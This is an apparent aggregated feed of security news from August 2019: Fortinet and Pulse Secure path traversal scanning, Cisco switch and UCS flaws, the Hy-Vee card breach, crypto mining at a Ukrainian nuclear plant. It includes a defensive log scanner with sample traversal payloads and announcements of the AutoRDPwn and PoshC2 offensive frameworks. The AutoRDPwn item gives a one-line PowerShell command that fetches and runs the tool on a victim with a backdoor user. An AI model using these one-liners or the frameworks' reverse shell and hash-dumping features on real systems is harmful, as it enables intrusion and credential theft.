“A path traversal vulnerability in the FortiOS SSL VPN web portal may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests.” reads the security advisory.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

“Unauthenticated remote attacker with network access via HTTPS can send a specially crafted URI to perform an arbitrary file reading vulnerability.” reads the advisory.

The vulnerabilities were first reported in July by researchers Orange Tsai and Meh Chang from DEVCORE that found several flaws in Fortinet, Palo Alto Networks and Pulse Secure products. The issues could be exploited by threat actors to access corporate networks and steal sensitive documents.

The security duo shared the results of their analysis at the Black Hat and DEFCON hacking conferences and proof-of-concept (PoC) exploits were publicly disclosed after their talks.

Even though the impacted vendors have released security advisories for the vulnerabilities discovered by the experts, attackers are attempting to exploit them in attacks in the wild.

Fortigate are calling this issue in FortiOS a “vulnerability” but to be clear it’s actually a major backdoor.

The backdoor code is flat out there in the OS, it even needs a ‘secret’ code typed to trigger it.

How did a major firewall vendor (almost 500k IPs) end up backdoored? https://t.co/GzCNXqtxDj

— Kevin Beaumont (@GossiTheDog) August 22, 2019

Beaumont pointed out that an attacker could exploit the CVE-2018-13379 flaw to obtain administrator credentials in plain text. Using the BinaryEdge online scanner, he also found nearly half a million IP addresses associated with Fortinet devices exposed online.

Beaumont detected scanning activity aimed at vulnerable Fortinet systems on August 21, while he spotted threat actors targeting Pulse Secure systems on August 22.

Clearly, it is important that admins apply the security patches released by vendors as soon as possible to mitigate possible attacks.
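As an added defender-side example (not code from the article or from either vendor), the following Python script scans constructed web-server access-log lines for the kind of path traversal request described above. It percent-decodes each request target, including double-encoded forms, which generalises beyond the plain ../../ pattern quoted in the tweet, and reports how far above the web root the decoded path reaches; all log lines, addresses and paths are constructed.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Common Log Format line: we need the client IP, the request target and the status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)


def decode_target(target: str, max_rounds: int = 3) -> str:
    """Percent-decode the request target repeatedly so that double-encoded
    sequences such as %252e%252e%252f still collapse to '../', then fold
    backslashes to forward slashes."""
    decoded = target
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.replace("\\", "/")


def traversal_depth(path: str) -> int:
    """How many directory levels above the web root the path reaches (0 = none).
    Walks the segments like a file server would: '..' pops a level, '.' and
    empty segments are ignored, anything else pushes a level."""
    path = path.split("?", 1)[0]
    depth = worst = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            worst = min(worst, depth)
        elif seg and seg != ".":
            depth += 1
    return -worst


def check_request(target: str) -> Optional[Dict[str, object]]:
    """Return a finding for a request target that contains a dot-dot segment
    after decoding, or None for a benign target."""
    decoded = decode_target(target)
    path = decoded.split("?", 1)[0]
    if ".." not in path.split("/"):
        return None
    depth = traversal_depth(path)
    return {
        "decoded": decoded,
        "depth": depth,
        "encoded": decoded != target,  # the sequence was hidden behind encoding
        "verdict": "escapes web root" if depth > 0 else "dot-dot inside root",
    }


def analyse_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run check_request over every parseable log line; unparseable lines are
    skipped here but should be counted and alerted on in production."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = check_request(m.group("target"))
        if finding is not None:
            finding.update(ip=m.group("ip"), status=int(m.group("status")),
                           target=m.group("target"))
            hits.append(finding)
    return hits


# Constructed sample log (IPs from the documentation range, paths invented).
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Aug/2019:10:01:02 +0000] "GET /remote/login HTTP/1.1" 200 1234',
    '203.0.113.7 - - [22/Aug/2019:10:01:05 +0000] "GET /static/../../../../constructed/secret.conf HTTP/1.1" 200 4096',
    '203.0.113.9 - - [22/Aug/2019:10:01:09 +0000] "GET /lang/..%2f..%2f..%2fconstructed%2fsecret.conf HTTP/1.1" 200 4096',
    '203.0.113.11 - - [22/Aug/2019:10:01:12 +0000] "GET /images/%252e%252e/%252e%252e/constructed HTTP/1.1" 404 0',
    '203.0.113.13 - - [22/Aug/2019:10:01:15 +0000] "GET /portal/./css/style.css?v=2 HTTP/1.1" 200 512',
    '203.0.113.15 - - [22/Aug/2019:10:01:18 +0000] "GET /a/../b HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for hit in analyse_log(SAMPLE_LOG):
        # A 200 on an escaping request means the file was most likely served.
        print(f'{hit["ip"]} {hit["status"]} depth={hit["depth"]} '
              f'{hit["verdict"]} encoded={hit["encoded"]} -> {hit["decoded"]}')
```

Requests that escape the root and returned a 200 are the ones to triage first, since the advisories describe the impact as file download; a dot-dot that stays inside the root is still worth a look on a VPN portal.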

Pierluigi Paganini

(SecurityAffairs – Pulse Security Products, hacking)

The post Hackers are scanning the web for vulnerable Fortinet, Pulse Secure Products installs appeared first on Security Affairs.

ZigDiggity – ZigBee Hacking Toolkit

By: Darknet
ZigDiggity – ZigBee Hacking Toolkit

ZigDiggity, a ZigBee hacking toolkit, is a Python-based IoT (Internet of Things) penetration testing framework targeting the ZigBee smart home protocol.

ZigBee continues to grow in popularity as a method for providing simple wireless communication between devices (i.e. low power/traffic, short distance), & can be found in a variety of consumer products that range from smart home automation to healthcare. Security concerns introduced by these systems are just as diverse and plentiful, underscoring a need for quality assessment tools.

Read the rest of ZigDiggity – ZigBee Hacking Toolkit now! Only available at Darknet.

AutoRDPwn v5.0 - The Shadow Attack Framework

By: Zion3R

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on-demand, using tools native to the operating system itself.
Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this through a completely intuitive menu in seven different languages.
Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.

Requirements
Powershell 4.0 or higher

Changes

Version 5.0
• New logo completely redesigned from scratch
• Full translation in 7 languages: es, en, fr, de, it, ru, pt
• Remote execution through a reverse shell with UAC and AMSI Bypass
• Partial support for Linux (more information in the user guide)
• Improved remote execution (internet connection is no longer necessary on the victim)
• New section available: Backdoors and persistence
• New module available: Remote Keylogger
• New section available: Privilege escalation
• New module available: Obtain information from the operating system
• New module available: Search vulnerabilities with Sherlock
• New module available: Escalate privileges with PowerUp
• New section available: Other Modules
• New module available: Execute an external script
*The rest of the changes can be consulted in the CHANGELOG file

Use
This application can be used locally, remotely or to pivot between computers.
When used remotely in a reverse shell, it is necessary to use the following parameters:
-admin / -noadmin -> Depending on the permissions we have, we will use one or the other
-nogui -> This will avoid loading the menu and some colors, guaranteeing its functionality
-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option -> As with the menu, we can choose how to launch the attack
-shadow -> We will decide if we want to see or control the remote device
-createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine
Local execution on one line:
powershell -ep bypass "cd $env:temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Example of remote execution on one line:
powershell -ep bypass "cd $env:temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots



Credits and Acknowledgments
This framework uses the following scripts and tools:
• Chachi-Enumerator of Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Get-System from HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell
• Invoke-DCOM of Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts
• Invoke-MetasploitPayload of Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload
• Invoke-Phant0m of Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp of Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz from Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz
• PsExec from Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper of Stas'M Corp. -> https://github.com/stascorp/rdpwrap
• SessionGopher of Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher
And many more that do not fit here. Thanks to all of them and their excellent work.

Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net


Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency

The Ukrainian Secret Service is investigating the case of employees at a nuclear power plant who connected its systems to the Internet to mine cryptocurrency.

The Ukrainian Secret Service (SBU) launched an investigation after employees at a local nuclear power plant connected some systems of the internal network to the Internet to mine cryptocurrency.

The incident was first reported by the Ukrainian news site UNIAN.

Nuclear power plants are critical infrastructure; an incident of this kind could potentially expose highly sensitive information.

The security incident happened in July at the South Ukraine Nuclear Power Plant at Yuzhnoukrainsk, in the south of the country.

On July 10, agents of the SBU raided the nuclear power plant and discovered the equipment used by the employees to mine cryptocurrency.

The equipment was found in the power plant’s administration offices.

The Ukrainian authorities are currently investigating whether any attackers may have used the exposed systems to access information that could threaten national security.

The SBU seized equipment consisting of two metal cases that contained coolers and video cards (Radeon RX 470 GPUs), computer components commonly used in mining farms.

“Further, the SBU also found and seized additional equipment that looked like mining rigs in the building used as barracks by a military unit of the National Guard of Ukraine, tasked with guarding the power plant.” reported ZDNet.

The authorities have charged several employees, but at the time of writing none has been arrested.

In February 2018, a similar incident took place in Russia. Russian authorities arrested some employees at the Russian Federation Nuclear Center facility because they were suspected of trying to use a supercomputer at the plant to mine Bitcoin.

In April 2018, an employee at the Romanian National Research Institute for Nuclear Physics and Engineering abused the institute’s electrical network to mine cryptocurrency.

Pierluigi Paganini

(SecurityAffairs – nuclear power plant, hacking)

The post Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency appeared first on Security Affairs.

Google Proposes 'Privacy Sandbox' to Develop Privacy-Focused Ads

Google today announced a new initiative—called Privacy Sandbox—in an attempt to develop a set of open standards that fundamentally enhances privacy on the web while continuing to support a free, open and democratic Internet through digital advertisements. A lot of websites on the Internet today, including The Hacker News, rely on online advertisements as their primary source of funding to

Cisco warns of the availability of public exploit code for critical flaws in Cisco Small Business switches

Cisco provided updates for security advisories for three flaws affecting Cisco Small Business 220 Series Smart Switches patched in early August.

Cisco has updated security advisories for three vulnerabilities in Cisco Small Business 220 Series Smart Switches that were patched in early August. The three vulnerabilities were reported by the security researcher Pedro Ribeiro, aka ‘bashis‘, via Cisco’s VDOO Disclosure Program.

According to the Cisco Product Security Incident Response Team (PSIRT), public exploit code for these flaws is available online.

Cisco Small Business 220 Series Smart Switches

One of the vulnerabilities is a critical remote code execution flaw tracked as CVE-2019-1913; an attacker could exploit it to execute arbitrary code with root privileges on the underlying operating system.

“Multiple vulnerabilities in the web management interface of Cisco Small Business 220 Series Smart Switches could allow an unauthenticated, remote attacker to overflow a buffer, which then allows the execution of arbitrary code with root privileges on the underlying operating system.” reads the security advisory.

“The vulnerabilities are due to insufficient validation of user-supplied input and improper boundary checks when reading data into an internal buffer. An attacker could exploit these vulnerabilities by sending malicious requests to the web management interface of an affected device. Depending on the configuration of the affected switch, the malicious requests must be sent via HTTP or HTTPS.”

Another flaw is an authentication bypass security flaw tracked as CVE-2019-1912 that resides in the web management interface of Cisco Small Business 220 Series Smart Switches. The flaw could be exploited by an attacker to modify the configuration of an affected device or to inject a reverse shell.

“A vulnerability in the web management interface of Cisco Small Business 220 Series Smart Switches could allow an unauthenticated, remote attacker to upload arbitrary files.” reads the security advisory.

“The vulnerability is due to incomplete authorization checks in the web management interface. An attacker could exploit this vulnerability by sending a malicious request to certain parts of the web management interface. Depending on the configuration of the affected switch, the malicious request must be sent via HTTP or HTTPS. A successful exploit could allow the attacker to modify the configuration of an affected device or to inject a reverse shell.”

The third flaw is a command injection vulnerability tracked as CVE-2019-1914 that could be exploited by an authenticated, remote attacker to launch a command injection attack.

The good news is that Cisco is not aware of attacks exploiting the above issues.

“The Cisco Product Security Incident Response Team (PSIRT) is aware of the existence of public exploit code. Cisco PSIRT is not aware of malicious use of the vulnerability that is described in this advisory.” states Cisco.

Cisco also released security patches to address 17 critical and high-severity vulnerabilities affecting some Cisco Unified Computing products (UCS) and Integrated Management Controller (IMC).

Also for these flaws, Cisco confirmed it is not aware of attacks in the wild that have exploited them.

Pierluigi Paganini

(SecurityAffairs – Cisco Small Business, hacking)

The post Cisco warns of the availability of public exploit code for critical flaws in Cisco Small Business switches appeared first on Security Affairs.

Breach at Hy-Vee Supermarket Chain Tied to Sale of 5M+ Stolen Credit, Debit Cards

On Tuesday of this week, one of the more popular underground stores peddling credit and debit card data stolen from hacked merchants announced a blockbuster new sale: More than 5.3 million new accounts belonging to cardholders from 35 U.S. states. Multiple sources now tell KrebsOnSecurity that the card data came from compromised gas pumps, coffee shops and restaurants operated by Hy-Vee, an Iowa-based company that operates a chain of more than 245 supermarkets throughout the Midwestern United States.

Hy-Vee, based in Des Moines, announced on Aug. 14 it was investigating a data breach involving payment processing systems that handle transactions at some Hy-Vee fuel pumps, drive-thru coffee shops and restaurants.

The restaurants affected include Hy-Vee Market Grilles, Market Grille Expresses and Wahlburgers locations that the company owns and operates. Hy-Vee said it was too early to tell when the breach initially began or for how long intruders were inside their payment systems.

But typically, such breaches occur when cybercriminals manage to remotely install malicious software on a retailer’s card-processing systems. This type of point-of-sale malware is capable of copying data stored on a credit or debit card’s magnetic stripe when those cards are swiped at compromised payment terminals. This data can then be used to create counterfeit copies of the cards.

Hy-Vee said it believes the breach does not affect payment card terminals used at its grocery store checkout lanes, pharmacies or convenience stores, as these systems rely on a security technology designed to defeat card-skimming malware.

“These locations have different point-of-sale systems than those located at our grocery stores, drugstores and inside our convenience stores, which utilize point-to-point encryption technology for processing payment card transactions,” Hy-Vee said. “This encryption technology protects card data by making it unreadable. Based on our preliminary investigation, we believe payment card transactions that were swiped or inserted on these systems, which are utilized at our front-end checkout lanes, pharmacies, customer service counters, wine & spirits locations, floral departments, clinics and all other food service areas, as well as transactions processed through Aisles Online, are not involved.”

According to two sources who asked not to be identified for this story — including one at a major U.S. financial institution — the card data stolen from Hy-Vee is now being sold under the code name “Solar Energy,” at the infamous Joker’s Stash carding bazaar.

An ad at the Joker’s Stash carding site for “Solar Energy,” a batch of more than 5 million credit and debit cards sources say was stolen from customers of supermarket chain Hy-Vee.

Hy-Vee said the company’s investigation is continuing.

“We are aware of reports from payment processors and the card networks of payment data being offered for sale and are working with the payment card networks so that they can identify the cards and work with issuing banks to initiate heightened monitoring on accounts,” Hy-Vee spokesperson Tina Pothoff said.

The card account records sold by Joker’s Stash, known as “dumps,” apparently stolen from Hy-Vee are being sold for prices ranging from $17 to $35 apiece. Buyers typically receive a text file that includes all of their dumps. Those individual dump records — when encoded onto a new magnetic stripe on virtually anything the size of a credit card — can be used to purchase stolen merchandise in big box stores.

As noted in previous stories here, the organized cyberthieves involved in stealing card data from main street merchants have gradually moved down the food chain from big box retailers like Target and Home Depot to smaller but far more plentiful and probably less secure merchants (either by choice or because the larger stores became a harder target).

It’s really not worth spending time worrying about where your card number may have been breached, since it’s almost always impossible to say for sure and because it’s common for the same card to be breached at multiple establishments during the same time period.

Just remember that while consumers are not liable for fraudulent charges, it may still fall to you the consumer to spot and report any suspicious charges. So keep a close eye on your statements, and consider signing up for text message notifications of new charges if your card issuer offers this service. Most of these services also can be set to alert you if you’re about to miss an upcoming payment, so they can also be handy for avoiding late fees and other costly charges.

PoshC2 - C2 Server and Implants

By: Zion3R

PoshC2 is a proxy aware C2 framework that utilises Powershell and/or equivalent (System.Management.Automation.dll) to aid penetration testers with red teaming, post-exploitation and lateral movement. Powershell was chosen as the base implant language as it provides all of the functionality and rich features without needing to introduce multiple third party libraries to the framework.
In addition to the Powershell implant, PoshC2 also has a basic dropper written purely in Python that can be used for command and control over Unix-based systems such as Mac OS or Ubuntu.
The server-side component is written in Python for cross-platform portability and speed. A Powershell server component still exists and can be installed using the 'Windows Install' as shown below, but it will not be maintained with future updates and releases.

Linux Install Python3
Automatic install for Python3 using curl & bash
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.sh | bash
Manual install Python3
wget https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.sh
chmod +x ./Install.sh
./Install.sh

Linux Install Python2 - stable but unmaintained
Automatic install for Python2 using curl & bash
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/python2/Install.sh | bash
Manual install Python2
wget https://raw.githubusercontent.com/nettitude/PoshC2_Python/python2/Install.sh
chmod +x ./Install.sh
./Install.sh

Windows Install
Install Git and Python (and ensure Python is in the PATH), then run:
powershell -exec bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.ps1')"

Using older versions
You can use an older version of PoshC2 by referencing the appropriate tag. You can list the tags for the repository by issuing:
git tag --list
or viewing them online.
Then you can use the install one-liner but replace the branch name with the tag:
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/<tag name>/Install.sh | bash
For example:
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/v4.8/Install.sh | bash

Offline
If you have a local clone of PoshC2 you can change the version that is in use by just checking out the version you want to use:
git reset --hard <tag name>
For example:
git reset --hard v4.8
However note that this will overwrite any local changes to files, such as Config.py and you may have to re-run the install script for that version or re-setup the environment appropriately.

Running PoshC2
  1. Edit the config file by running posh-config to open it in $EDITOR. If this variable is not set then it defaults to vim, or you can use --nano to open it in nano.
  2. Run the server using posh-server or python3 -u C2Server.py | tee -a /var/log/poshc2_server.log
  3. Others can view the log using posh-log or tail -n 5000 -f /var/log/poshc2_server.log
  4. Interact with the implants using the handler, run by using posh or python3 ImplantHandler.py

Installing as a service
Installing as a service provides multiple benefits such as being able to log to service logs, viewing with journalctl and automatically starting on reboot.
  1. Add the file in systemd (this is automatically done via the install script)
cp poshc2.service /lib/systemd/system/poshc2.service
  2. Start the service
posh-service
  3. View the log:
posh-log
  4. Or alternatively use journalctl (but note this can be rate limited)
journalctl -n 20000 -u poshc2.service -f --output cat
Note that re-running posh-service will restart the service. Running posh-service automatically starts displaying the log, but Ctrl-C only quits the log view and does not stop the service; posh-log can be used to view the log again at any point. posh-stop-service can be used to stop the service.

Issues / FAQs
If you are experiencing any issues during the installation or use of PoshC2 please check the known issues below and the open issues tracking page within GitHub. If this page doesn't have what you're looking for please open a new issue and we will try to resolve the issue asap.
If you are looking for tips and tricks on PoshC2 usage and optimisation, you are welcome to join the slack channel below.

License / Terms of Use
This software should only be used for authorised testing activity and not for malicious use.
By downloading this software you are accepting the terms of use and the licensing agreement.

Documentation
We maintain PoshC2 documentation over at https://poshc2.readthedocs.io/en/latest/
Find us on #Slack - poshc2.slack.com (to request an invite send an email to labs@nettitude.com)

Known issues

Error encrypting value: object type
If you get this error after installing PoshC2 it is due to dependency clashes in the pip packages on the system.
Try creating a virtualenv in python and re-install the requirements so that the exact versions specified are in use for PoshC2. Make sure you deactivate when you've finished in this virtualenv.
For example:
pip install virtualenv
virtualenv /opt/PoshC2_Python/
source /opt/PoshC2_Python/bin/activate
pip install -r requirements.txt
python C2Server.py
Note that any time you run PoshC2 you have to reactivate the virtual environment and run it from there.
The use of a virtual environment is abstracted if you use the posh- scripts on *nix.


Cisco addressed several vulnerabilities in UCS products

Cisco released security patches to address 17 critical and high-severity vulnerabilities affecting some Cisco Unified Computing products (UCS and IMC).

Cisco has released security fixes to address 17 critical and high-severity vulnerabilities affecting some Cisco Unified Computing products.

Most of the flaws affect the Integrated Management Controller (IMC), a baseboard management controller that provides embedded server management for Cisco Unified Computing System (UCS) servers.

The critical flaws impacting Cisco UCS addressed by the tech giant are CVE-2019-1937, CVE-2019-1974, CVE-2019-1935 and CVE-2019-1938. These flaws could be exploited by remote, unauthenticated attackers to gain elevated privileges, including administrator permissions, on the targeted system.

A remote attacker could exploit the vulnerabilities by sending specially crafted requests and abusing default credentials.

“A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) Supervisor, Cisco UCS Director, and Cisco UCS Director Express for Big Data could allow an unauthenticated, remote attacker to acquire a valid session token with administrator privileges, bypassing user authentication.” reads the advisory for the CVE-2019-1937 flaw.

“The vulnerability is due to insufficient request header validation during the authentication process. An attacker could exploit this vulnerability by sending a series of malicious requests to an affected device. An exploit could allow the attacker to use the acquired session token to gain full administrator access to the affected device.”

Cisco also addressed multiple high-severity vulnerabilities that could be exploited to trigger a denial-of-service (DoS) condition, execute arbitrary commands with root privileges, obtain sensitive configuration data, elevate privileges, and modify the system configuration.

Some of the flaws addressed by Cisco have been reported by the security researcher Pedro Ribeiro, aka “bashis,” another expert whose identity was not revealed, and some other external researchers.

The good news is that Cisco is not aware of attacks in the wild that have exploited the flaws in UCS and IMC products.

Pierluigi Paganini

(SecurityAffairs – Cisco Unified Computing Products, hacking)

The post Cisco addressed several vulnerabilities in UCS products appeared first on Security Affairs.

AWS Security Monitoring Checklist [Updated 2019]

Since every organization is moving towards cloud, the roles and responsibilities of in-house security teams have increased a lot. Due to lack of complete ownership, security teams do not have visibility and control of the underlying/leased infrastructure. In this article, we will examine the security checklist for AWS which every security team should keep an […]

The post AWS Security Monitoring Checklist [Updated 2019] appeared first on Infosec Resources.


AWS Security Monitoring Checklist [Updated 2019] was first posted on August 23, 2019 at 8:22 am.